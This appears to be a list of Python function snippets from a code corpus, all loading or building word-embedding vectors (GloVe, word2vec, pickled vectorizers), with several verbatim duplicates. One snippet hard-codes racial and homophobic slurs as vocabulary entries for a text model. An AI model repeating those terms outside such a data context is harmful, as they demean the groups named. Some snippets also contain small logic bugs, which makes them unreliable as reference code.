"def load_vecs():\n global VECTORIZER\n global CECTORIZER\n\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n\n if os.path.isfile(v_file) and os.path.isfile(d_file):\n with open(v_file, 'rb') as f:\n VECTORIZER = pickle.load(f)\n with open(d_file, 'rb') as f:\n CECTORIZER = pickle.load(f)\n return True\n\n return False",
"def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove",
"def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove",
"def _load_glove_vec(fname, vocab):\n print 'load glove...'\n word_vecs = {}\n cnt = 0\n l = open(fname,'r').readline()\n embedding_size = len(l.strip().split()) -1\n print 'embedding vector size: %d'%(embedding_size)\n with open(fname, \"r\") as f:\n for l in f:\n stemp = l.strip().split(' ',1)\n assert len(stemp) == 2\n word = stemp[0]\n if word in vocab:\n word_vecs[stemp[0]] = np.fromstring(' '.join(stemp[1:]),sep = ' ')\n cnt+=1\n if cnt%10000==0:\n print '%d lines...'%cnt\n return (word_vecs,embedding_size)",
"def load_glove_vec(fname):\n word_vecs = {}\n length = 0\n with open(fname, \"rb\") as f:\n for i, line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n word_vecs[word] = np.array(L[1:], dtype='float32')\n if length == 0:\n length = len(word_vecs[word])\n return word_vecs, length",
"def _load_bin_vec(fname, vocab):\n print 'load bin...'\n word_vecs = {}\n cnt = 0\n\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n print 'embedding vocab size: %d , embedding vector size: %d'%(vocab_size,layer1_size)\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n cnt +=1\n if cnt%10000 == 0:\n \tprint '%d lines...'%cnt\n return (word_vecs, layer1_size)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def __init__(self, text):\n self.text = text\n self.train_vec = np.load('feat.npy')\n self.train_output = pickle.load(open('mylist.pkl', 'rb'))\n self.vec = pickle.load(open('vector.pkl', 'rb'))",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def loadGloveDicFromFile():\n \n #if the resource file is not present, creates the file containing all vectors\n #and return vectors\n if not isfile(GLOVE_DICT_FILE):\n vects = _extractGloveVects()\n saveGloveDicIntoFile(vects)\n return vects\n \n return np.load(GLOVE_DICT_FILE)[0]",
"def dep_w2v(data_fname='deps.words', out_fname='depw2v.pkl'):\n M = np.loadtxt(DATA_DIR + data_fname, converters={0: lambda x: 0})\n M = M[:, 1:]\n print \"Loaded {0}x{1} word vector matrix\".format(*M.shape)\n with open(DATA_DIR + data_fname, 'rb') as f:\n words = [line.split()[0] for line in f]\n with open(DATA_DIR + out_fname, 'wb') as f:\n cPickle.dump((words, M), f)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs",
"def load_word2vec(word2vec_json_file):\n word2vec = json.load(open(word2vec_json_file, \"r\"))\n print (\"padding \" + str(word2vec[\"padding\"][0]))\n return word2vec",
"def load_dictionary(filename):\n filename = os.path.join(FILE_DIR, 'assets/obj/' + filename)\n try:\n with open(filename, 'rb') as input:\n return pickle.load(input)\n except Exception as e:\n print(\"exception\", e)",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n # print(vocab_size)\n for line in range(vocab_size):\n # print(line)\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n # print(word)\n if word in vocab:\n # print(word)\n word_vecs[word] = np.frombuffer(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n\n return word_vecs",
"def _load_word_embedding(self, lang):\n dict_fold = 'train' # which fold of the data will be used to produce results\n if self.args.task == 'conneau' or self.args.task == 'xling':\n data_dir = os.path.join(self.args.data_dir, 'MUSE')\n lang_path = os.path.join(data_dir, 'wiki.' + lang + '.vec')\n elif self.args.task == 'dinu':\n data_dir = os.path.join(self.args.data_dir, 'dinu')\n lang_path = os.path.join(data_dir, 'embeddings', lang + '.emb.txt')\n elif self.args.task == 'zhang':\n order = [lang,trg]\n if lang == 'en':\n order = order[::-1]\n data_dir = os.path.join(self.args.home_dir,'pkg/UBiLexAT/data/','-'.join(order))\n lang_path = os.path.join(data_dir, 'word2vec.' + lang)\n\n langfile = open(lang_path, encoding=self.args.encoding, errors='surrogateescape')\n words, xs = embeddings.read(langfile, self.args.maxs)\n langfile.close()\n # Build word to index map\n word2ind = {word: i for i, word in enumerate(words)}\n\n return xs, words, word2ind",
"def add_vector(self, name, text, tag=None):\n words = self.clean_text_util.clean_text(text)\n \n # max{f(w,d) : w ∈ d)}\n counter = Counter(words)\n _, max_occ = counter.most_common(1)[0] \n\n # remove duplicate word\n words = set(words)\n \n items = []\n for word in words:\n pickle_wordinfo = self.dictionary_db.get(word)\n if not pickle_wordinfo:\n continue\n \n word_info = pickle.loads(pickle_wordinfo)\n\n # tf formula: tf(f,d) = f(f,d)/max{f(w,d) : w ∈ d)} (src Wikipedia)\n tf = counter[word]/float(max_occ)\n\n # create a new vector item entry\n items.append(VectorItem(word, tf))\n\n # sort the vector item by the dictionary index\n items.sort(key=lambda x: x.word_info(self.dictionary_db).index)\n\n # finally, we create a new vector\n vector = Vector(items, tag)\n self.vectors_db.add(name, pickle.dumps(vector))\n\n # add an empty entry to the norm db\n self.vectors_norm_db.add(name, self.vector_tfidf_norm(items))",
"def construct_embedding(self):\n i = 0\n self.load_dicts()\n embedding_shape = (max(self.word2idx.values()) + 1,\n self.embedding_size)\n self.embedding = np.zeros(embedding_shape)\n\n with open(self.config.word_vec_fi_glove, 'r') as fi:\n for line in fi:\n word_vec = line.split(\" \")[1:]\n self.embedding[i, :] = np.array(word_vec, dtype=np.float32)\n i += 1\n\n self.write_embedding()",
"def create_or_load_slim_w2v(words_list):\n w2v_path = \"w2v_dict.pkl\"\n if not os.path.exists(w2v_path):\n full_w2v = load_word2vec()\n w2v_for_curpos = {k: full_w2v[k] for k in words_list if k in full_w2v}\n w2v_emb_dict = EmbeddingDict(w2v_for_curpos, W2V_EMBEDDING_DIM)\n save_pickle(w2v_emb_dict,w2v_path)\n else:\n w2v_emb_dict = load_pickle(w2v_path)\n return w2v_emb_dict",
"def _load_dict(self, dict_name=None):\n if dict_name is None:\n for name in self.dict_names:\n self._load_dict(name)\n else:\n dict_idx = self.dict_names.index(dict_name)\n if not os.path.exists(self.dict_files[dict_idx]):\n self.logger.warn(\"Not exists %s for %s\" % (\n self.dict_files[dict_idx], dict_name))\n else:\n dict_map = self.dicts[dict_idx]\n id_to_vocab_dict_map = self.id_to_vocab_dict_list[dict_idx]\n if dict_name != self.DOC_LABEL:\n dict_map[self.VOCAB_PADDING] = 0\n dict_map[self.VOCAB_UNKNOWN] = 1\n dict_map[self.VOCAB_PADDING_LEARNABLE] = 2\n id_to_vocab_dict_map[0] = self.VOCAB_PADDING\n id_to_vocab_dict_map[1] = self.VOCAB_UNKNOWN\n id_to_vocab_dict_map[2] = self.VOCAB_PADDING_LEARNABLE\n\n for line in open(self.dict_files[dict_idx], \"r\"):\n vocab = line.strip(\"\\n\").split(\"\\t\")\n dict_idx = len(dict_map)\n dict_map[vocab[0]] = dict_idx\n id_to_vocab_dict_map[dict_idx] = vocab[0]",
"def load_vectors(self, wv_dir=os.getcwd(), wv_type=None, wv_dim=300, unk_init='random'):\n self.unk_init = unk_init\n wv_dict, wv_arr, self.wv_size = load_word_vectors(wv_dir, wv_type, wv_dim)\n self.set_vectors(wv_dict, wv_arr)",
"def load_model(self, file=FILENAME, dim=DIMENSION, normalize=False):\n print(\"Loading pretrained Glove vectors from file {}\".format(FILENAME))\n self.dimension = dim\n self.normalize = normalize\n with open(file, \"r\", encoding=\"utf-8\") as textfile:\n self.num_tokens = count_lines(textfile)\n self.tokens_arr = [\"\" for i in range(self.num_tokens)]\n self.embeddings_mat = np.zeros((self.num_tokens, self.dimension))\n\n for idx, line in enumerate(textfile):\n line = line.split()\n token = ''.join(line[:-self.dimension])\n self.tokens_arr[idx] = token\n self.token_to_idx[token] = idx \n vec = list(map(float, line[-self.dimension:]))\n if self.normalize: \n # normalize the vectors as they are put into the matrix\n vec = vec / np.linalg.norm(vec)\n self.embeddings_mat[idx] = vec \n if (idx+1) % 200000 == 0:\n print(\" --{}% loaded.\".format(round(idx/self.num_tokens*100, 2)))\n print(\"Finished loading Glove model. {} vectors loaded\".format(self.num_tokens))",
"def load(cls, model_path):\n\n # with open(model_path, \"rb\") as f:\n # tfidf_vectorizer = pickle.load(f)\n tfidf_vectorizer = pickle.load(open(model_path, \"rb\"))\n print(type(tfidf_vectorizer))\n\n return tfidf_vectorizer",
"def load_dictionary(location='../data/wordlist.pkl'):\n words = joblib.load(location)\n # Simple plurals not necessary since removed in word correction\n manual_addition = ['sis', 'vixen' ,'ho', 'hoe', 'aint', 'nigga', 'nigger', 'bitch', 'bitches', 'lmao', 'pussy',\n 'fuck', 'fucking', 'fag', 'faggot', 'hater', 'lol', 'yall', 'nfl', 'fucked', 'nips', 'crap',\n 'whitey', 'ghetto', 'mac', 'tho', 'jamming', 'titties', 'dyke', 'fb', 'lmfao', 'bae', 'kanye',\n 'coon', 'smh', 'tweet', 'retweet', 'nbc', 'jk', 'im']\n for word in manual_addition:\n words[word] = 99999 # add word to counter\n return words",
"def load_word_vectors(self, sentence_entry):\n word_vectors = []\n for token, lemma in zip(sentence_entry.tokens, sentence_entry.lemmas):\n # Go through the lookup chain. If one of these is found in the vsm,\n # return it, else use the fallback and report oov\n for s in [token, token.lower(), lemma, lemma.lower()]:\n if self.embeddings.contains_word(s):\n vector = self.embeddings.word_to_vec(s)\n self.statistics.known_token()\n break\n else:\n self.statistics.unknown_token()\n vector = self.embeddings.get_zero_fallback()\n\n word_vectors.append(vector)\n return word_vectors",
"def load_glove_embeddings():\n\n emmbed_file = Path(\"./embeddings.pkl\")\n if emmbed_file.is_file():\n # embeddings already serialized, just load them\n print(\"Local Embeddings pickle found, loading...\")\n with open(\"./embeddings.pkl\", 'rb') as f:\n return pk.load(f)\n else:\n # create the embeddings\n print(\"Building embeddings dictionary...\")\n data = open(\"glove.6B.50d.txt\", 'r', encoding=\"utf-8\")\n embeddings = [[0] * EMBEDDING_SIZE]\n word_index_dict = {'UNK': 0} # first row is for unknown words\n index = 1\n for line in data:\n splitLine = line.split()\n word = tf.compat.as_str(splitLine[0])\n embedding = [float(val) for val in splitLine[1:]]\n embeddings.append(embedding)\n word_index_dict[word] = index\n index += 1\n data.close()\n\n # pickle them\n with open('./embeddings.pkl', 'wb') as f:\n print(\"Creating local embeddings pickle for faster loading...\")\n # Pickle the 'data' dictionary using the highest protocol available.\n pk.dump((embeddings, word_index_dict), f, pk.HIGHEST_PROTOCOL)\n\n return embeddings, word_index_dict",
"def load_glove_vectors(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]",
"def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels",
"def load_vectors(args):\n dict_fold = 'train' # which fold of the data will be used to produce results\n if args.task == 'conneau' or 'xling':\n data_dir = os.path.join(args.data_dir, 'MUSE')\n dict_dir = os.path.join(data_dir, 'crosslingual/')\n if args.task == 'xling':\n dict_dir = os.path.join(dict_dir, 'xling-dictionaries/bli_datasets/')\n else:\n dict_dir = os.path.join(dict_dir, 'dictionaries/')\n\n src_path = os.path.join(data_dir, 'wiki.' + args.src_lang + '.vec')\n trg_path = os.path.join(data_dir, 'wiki.' + args.trg_lang + '.vec')\n src_freq_path = None\n trg_freq_path = None\n if dict_fold == 'test':\n postfix = '.5000-6500.txt'\n elif dict_fold == 'train':\n postfix = '.0-5000.txt'\n else:\n raise ValueError('Unrecognized dictionary fold for evaluation')\n elif args.task == 'dinu':\n data_dir = os.path.join(args.data_dir,'dinu')\n dict_dir = os.path.join(data_dir, 'dictionaries/')\n src_path = os.path.join(data_dir, 'embeddings', args.src_lang + '.emb.txt')\n trg_path = os.path.join(data_dir, 'embeddings', args.trg_lang + '.emb.txt')\n src_freq_path = None\n trg_freq_path = None\n postfix = '.{}.txt'.format(dict_fold)\n elif args.task == 'zhang':\n order = [args.src_lang,args.trg_lang]\n if args.src_lang == 'en':\n order = order[::-1]\n data_dir = os.path.join(args.home_dir,'pkg/UBiLexAT/data/','-'.join(order))\n dict_dir = data_dir\n src_path = os.path.join(data_dir, 'word2vec.' + args.src_lang)\n trg_path = os.path.join(data_dir, 'word2vec.' + args.trg_lang)\n src_freq_path = os.path.join(data_dir, 'vocab-freq.' + args.src_lang)\n trg_freq_path = os.path.join(data_dir, 'vocab-freq.' + args.trg_lang)\n postfix = '.train.txt'\n\n srcfile = open(src_path, encoding=args.encoding, errors='surrogateescape')\n trgfile = open(trg_path, encoding=args.encoding, errors='surrogateescape')\n src_words, xs = embeddings.read(srcfile, args.maxs)\n trg_words, xt = embeddings.read(trgfile, args.maxt)\n srcfile.close()\n trgfile.close()\n \n if src_freq_path:\n with open(src_freq_path, encoding=args.encoding, errors='surrogateescape') as f:\n lines = [a.split(' ') for a in f.read().strip().split('\\n')]\n freq_src = {k: int(v) for (k,v) in lines}\n\n with open(trg_freq_path, encoding=args.encoding, errors='surrogateescape') as f:\n lines = [a.split(' ') for a in f.read().strip().split('\\n')]\n freq_trg = {k: int(v) for (k,v) in lines}\n\n # Build word to index map\n src_word2ind = {word: i for i, word in enumerate(src_words)}\n trg_word2ind = {word: i for i, word in enumerate(trg_words)}\n\n if args.task == 'zhang':\n dict_path = os.path.join(dict_dir, 'all.' + '-'.join(order) + '.lex')\n flip = False\n elif args.task == 'dinu' and args.src_lang != 'en':\n # Only has dicts in one direction, flip\n dict_path = os.path.join(dict_dir, args.trg_lang + '-' + args.src_lang + postfix)\n src_to_en = os.path.join(dict_dir, 'en' + '-' + args.src_lang + postfix)\n en_to_trg = os.path.join(dict_dir, args.trg_lang + '-' + 'en' + postfix)\n flip = True\n elif args.task == 'xling':\n dict_path = os.path.join(dict_dir, args.src_lang+'-'+args.trg_lang+'/yacle.test.freq.2k.'+args.src_lang+'-' + args.trg_lang + '.tsv')\n src_to_en = os.path.join(dict_dir, args.src_lang+'-'+'en'+'/yacle.test.freq.2k.'+args.src_lang+'-' + 'en' + '.tsv')\n en_to_trg = os.path.join(dict_dir, 'en'+'-'+args.trg_lang+'/yacle.test.freq.2k.'+'en'+'-' + args.trg_lang + '.tsv')\n\n flip = False\n if not os.path.exists(dict_path):\n dict_path = os.path.join(dict_dir, args.trg_lang+'-'+args.src_lang+'/yacle.test.freq.2k.'+args.src_lang+'-' + args.trg_lang + '.tsv')\n flip = True\n\n else:\n src_to_en = os.path.join(dict_dir, args.src_lang + '-' + 'en' + postfix)\n en_to_trg = os.path.join(dict_dir, 'en' + '-' + args.trg_lang + postfix)\n dict_path = os.path.join(dict_dir, args.src_lang + '-' + args.trg_lang + postfix)\n flip = False\n\n\n if not os.path.exists(dict_path):\n # create new dict\n print('Warning: no dict found, creating dictionary')\n create_dict_for(src_to_en, en_to_trg, dict_path, args)\n\n dictf = open(dict_path, encoding=args.encoding, errors='surrogateescape')\n src2trg = collections.defaultdict(set)\n oov = set()\n vocab = set()\n max_srcind = 0 # These are mostly for debug\n max_trgind = 0\n for line in dictf:\n splitted = line.split()\n if len(splitted) > 2:\n # Only using first translation if many are provided\n src, trg = splitted[:2]\n elif len(splitted) == 2:\n src, trg = splitted\n else:\n # No translation? Only happens for Zhang data so far\n continue\n if flip: src, trg = trg, src\n try:\n src_ind = src_word2ind[src]\n trg_ind = trg_word2ind[trg]\n src2trg[src_ind].add(trg_ind)\n vocab.add(src)\n max_srcind = max(max_srcind, src_ind)\n max_trgind = max(max_trgind, trg_ind)\n except KeyError:\n oov.add(src)\n\n return xs, xt, src_words, trg_words, src_word2ind, trg_word2ind, src2trg",
"def load_gloves(self, dir):\n self.word2vec = {}\n glove_file = os.path.join(dir, 'glove.6B.'+str(self.dim_embed)+'d.txt')\n with open(glove_file, encoding=\"utf8\") as f:\n for line in f:\n l = line.split()\n self.word2vec[l[0]] = [float(x) for x in l[1:]]\n self.word2vec[\"<RARE>\"] = [0. for i in range(self.dim_embed)]\n self.word2vec[\"<EMPTY>\"] = [0. for i in range(self.dim_embed)]",
"def load_embeddings(embedding_path):\n print('loading word embeddings from %s' % embedding_path)\n weight_vectors = []\n word_idx = {}\n with codecs.open(embedding_path, encoding='utf-8') as f:\n for line in f:\n word, vec = line.split(u' ', 1)\n word_idx[word] = len(weight_vectors)\n weight_vectors.append(np.array(vec.split(), dtype=np.float32))\n # Annoying implementation detail; '(' and ')' are replaced by '-LRB-' and\n # '-RRB-' respectively in the parse-trees.\n word_idx[u'-LRB-'] = word_idx.pop(u'(')\n word_idx[u'-RRB-'] = word_idx.pop(u')')\n # Random embedding vector for unknown words.\n weight_vectors.append(np.random.uniform(\n -0.05, 0.05, weight_vectors[0].shape).astype(np.float32))\n return np.stack(weight_vectors), word_idx",
"def __init__(self, vector_file='', transform=None):\n self.word2id = {}\n\n # Captures word order, for export() and translate methods\n self.id2word = []\n\n print('reading word vectors from %s' % vector_file)\n with open(vector_file, 'r', errors='ignore') as f:\n line = f.readline()\n header_tokens = line.rstrip('\\n').split(' ')\n if len(header_tokens) == 2:\n self.n_words, self.n_dim = [int(x) for x in header_tokens]\n self.embed = np.zeros((self.n_words, self.n_dim))\n lines = f.read().split('\\n')\n for i, line in enumerate(lines):\n if line == '':\n continue\n elems = line.rstrip('\\n').split(' ')\n self.word2id[elems[0]] = i\n self.embed[i] = elems[1:self.n_dim + 1]\n self.id2word.append(elems[0])\n else:\n self.n_words, self.n_dim = 2196017, 300\n self.embed = np.zeros((self.n_words, self.n_dim))\n self.word2id[header_tokens[0]] = 0\n self.embed[0] = header_tokens[1:self.n_dim + 1]\n self.id2word.append(header_tokens[0])\n for i, line in enumerate(f.read().split('\\n')):\n if line == '':\n continue\n elems = line.rstrip('\\n').split(' ')\n self.word2id[elems[0]] = i+1\n self.embed[i+1] = elems[1:self.n_dim+1]\n self.id2word.append(elems[0])\n\n # Used in translate_inverted_softmax()\n self.softmax_denominators = None\n\n if transform is not None:\n print('Applying transformation to embedding')\n self.apply_transform(transform)",
"def __init__(self, model=\"glove.840B.300d.txt\", dictionary=\"words.txt\", pattern=\"^[a-z][a-z-]*[a-z]$\"):\n\n # Keep unique words matching pattern from file\n words = set()\n with open(dictionary, \"r\", encoding=\"utf8\") as f:\n for line in f:\n if re.match(pattern, line):\n words.add(line.rstrip(\"\\n\"))\n\n # Join words with model\n vectors = {}\n with open(model, \"r\", encoding=\"utf8\") as f:\n for line in f:\n tokens = line.split(\" \")\n word = tokens[0]\n if word in words:\n vector = numpy.asarray(tokens[1:], \"float32\")\n vectors[word] = vector\n self.vectors = vectors",
"def pickle_vectorizer(self, path='models/TFIDFVectorizer.pkl'):\n with open(path, 'wb') as f:\n pickle.dump(self.vectorizer, f)\n print(\"Pickled vectorizer at {}\".format(path))",
"def loadGLOVE(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with codecs.open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n tf.logging.info(\"Found {} out of {} vectors in Glove\".format(num_vectors, len(vocab)))\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]",
"def load_preprocessed(self):\n with open(self.words_vocab_file, 'rb') as f:\n self.word_to_id, self.unk_word_list = pickle.load(f)\n self.word_vocab_size = len(self.word_to_id)\n\n if self.unit != \"word\":\n with open(self.sub_vocab_file, 'rb') as f:\n if self.unit == \"char\":\n self.max_word_len = self.get_max_word_length(self.word_to_id) + 2\n self.char_to_id, self.unk_char_list, self.max_word_len = pickle.load(f)\n self.subword_vocab_size = len(self.char_to_id)\n elif self.unit == \"char-ngram\":\n self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, \\\n self.max_ngram_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.ngram_to_id)\n elif self.unit == \"morpheme\":\n self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, \\\n self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n elif self.unit == \"oracle\":\n self.morpheme_to_id, self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n else:\n sys.exit(\"Unknown unit\")",
"def make_embedding(path, words, indices):\n #root = '/'.join(path.split('/')[0:-1])\n #all_paths = [root+'/'+x for x in os.listdir(root)] #'/'.join(path.split('/')[0:-1]))\n #for path in all_paths:\n vec_path = 'data/'+path.split('/')[-1]+'_'+mode\n print(vec_path)\n if os.path.exists(vec_path+'.npy'):\n np_vecs = np.load(vec_path+'.npy')\n else:\n words_len = len(words)\n vecs = []\n if mode == 'word':\n f = load_model('wiki.en.bin')\n for i, w in enumerate(words):\n if mode == 'word':\n vec = f.get_word_vector(w)\n else:\n vec = eye[indices[w]]\n vecs.append(vec) \n if i % 10000 == 0:\n print(\"{} / {}\".format(i, words_len))\n np_vecs = np.asarray(vecs, dtype=np.int8)\n np.save(vec_path, np_vecs)\n return np_vecs",
"def _add_pre_trained_embedding(self):\n\n if self.embedding_type['type'] == 'glove':\n self.logging.info('use pre-trained glove word2vec')\n # a. load pre trained glove\n GLOVE_DIR = '../data/glove_pretrained/glove.6B'\n glove_suffix_name = 'glove.6B.' + str(self.embedding_size) + 'd.txt'\n import os\n import numpy as np\n\n embeddings_index = {}\n f = open(os.path.join(GLOVE_DIR, glove_suffix_name)) # 'glove.6B.100d.txt'))\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n\n self.logging.info('')\n self.logging.info('Found %s word vectors.' % len(embeddings_index))\n\n # b. compute embedding matrix\n embedding_matrix = np.zeros((len(self.word_index) + 1, self.embedding_size))\n cnt = 0\n for word, i in self.word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector # words not found in embedding index will be all-zeros.\n else:\n # self.logging.info('token in train missing in word2vec: ' + str(word))\n cnt += 1\n self.logging.info('total tokens missing: ' + str(cnt) + ' / ' + str(len(self.word_index)))\n\n # c. build embedding layer\n from keras.layers import Embedding\n embedding_layer = Embedding(len(self.word_index) + 1,\n self.embedding_size,\n weights=[embedding_matrix],\n input_length=self.maxlen,\n trainable=False)\n\n elif self.embedding_type['type'] == 'gensim':\n self.logging.info('use pre-trained gensim word2vec')\n\n import gzip\n import gensim\n from keras.layers import Embedding\n import numpy as np\n\n # fname = '../data/word2vec_pretrained/motors/d_300_k_712904_w_6_e_60_v_motors'\n # fname = '../data/word2vec_pretrained/fashion/d_300_k_1341062_w_6_e_70_v_fashion'\n\n self.logging.info('load word2vec path: ' + str(self.embedding_type['path']))\n model = gensim.models.Word2Vec.load(self.embedding_type['path'])\n pretrained_weights = model.wv.syn0\n vocab_size, vector_dim = pretrained_weights.shape\n\n method = 3\n if method == 1:\n self.logging.info('word2vec attempt to fit into embedding layer - middle complex')\n # convert the wv word vectors into a numpy matrix that is suitable for insertion\n # into our TensorFlow and Keras models\n\n embedding_matrix = np.zeros((len(model.wv.vocab), vector_dim))\n for i in range(len(model.wv.vocab)):\n embedding_vector = model.wv[model.wv.index2word[i]]\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n embedding_layer = Embedding(input_dim=embedding_matrix.shape[0],\n output_dim=embedding_matrix.shape[1],\n # input_length=self.maxlen,\n weights=[embedding_matrix],\n trainable=False)\n elif method == 2:\n self.logging.info('word2vec simple embedding matching - simple complex')\n embedding_layer = Embedding(input_dim=vocab_size,\n output_dim=vector_dim,\n input_length=self.maxlen,\n weights=[pretrained_weights],\n trainable=False)\n elif method == 3:\n\n self.logging.info('word2vec match using word_index from keras tokenizer - as used in glove match above')\n # b. compute embedding matrix\n\n # sd = 1 / np.sqrt(len(self.word_index) + 1)\n # embedding_matrix = np.random.normal(0, scale=sd, size=(len(self.word_index) + 1, self.embedding_size))\n\n embedding_matrix = np.zeros((len(self.word_index) + 1, self.embedding_size))\n cnt = 0\n for word, i in self.word_index.items():\n if word in model.wv:\n embedding_vector = model.wv[word]\n embedding_matrix[i] = embedding_vector\n else:\n # self.logging.info('token in train missing in word2vec: ' + str(word))\n cnt += 1\n self.logging.info('total tokens missing: ' + str(cnt))\n\n\n # c. build embedding layer\n from keras.layers import Embedding\n embedding_layer = Embedding(len(self.word_index) + 1,\n self.embedding_size,\n weights=[embedding_matrix],\n input_length=self.maxlen,\n trainable=False)\n else:\n raise ValueError('unknown method value')\n\n else:\n raise ValueError('unknown embedding type')\n self.logging.info('create glove pre-trained embedding: ' + str(self.embedding_size))\n return embedding_layer",
"def load_word_vectors(filepath, word_index, vector_size):\n embedding_matrix = np.zeros((len(word_index) + 1, vector_size))\n\n fin = io.open(filepath, \"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\")\n n, d = map(int, fin.readline().split())\n\n for line in fin:\n tokens = line.rstrip().split(\" \")\n if tokens[0] in word_index:\n w = word_index[tokens[0]]\n embedding_matrix[w] = np.fromiter(map(float, tokens[1:]), \"float\")\n\n return embedding_matrix",
"def load_embedding(fname, vocab):\n model = gensim.models.Word2Vec.load(fname)\n embedding = model.wv # keep only the embedding dictionary\n del model # frees up memory used to store Word2Vec model\n\n k = len(embedding['a']) # dimension of embedding\n unknown_vec = lambda: np.random.normal(0,0.17,k) #TODO check these parameters\n \n restricted_embedding = {word: default_get(embedding, word, unknown_vec()) for word in vocab}\n return restricted_embedding",
"def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))",
